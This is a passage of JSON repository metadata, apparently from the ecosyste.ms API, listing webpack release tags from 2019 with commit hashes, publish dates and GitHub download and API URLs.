2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz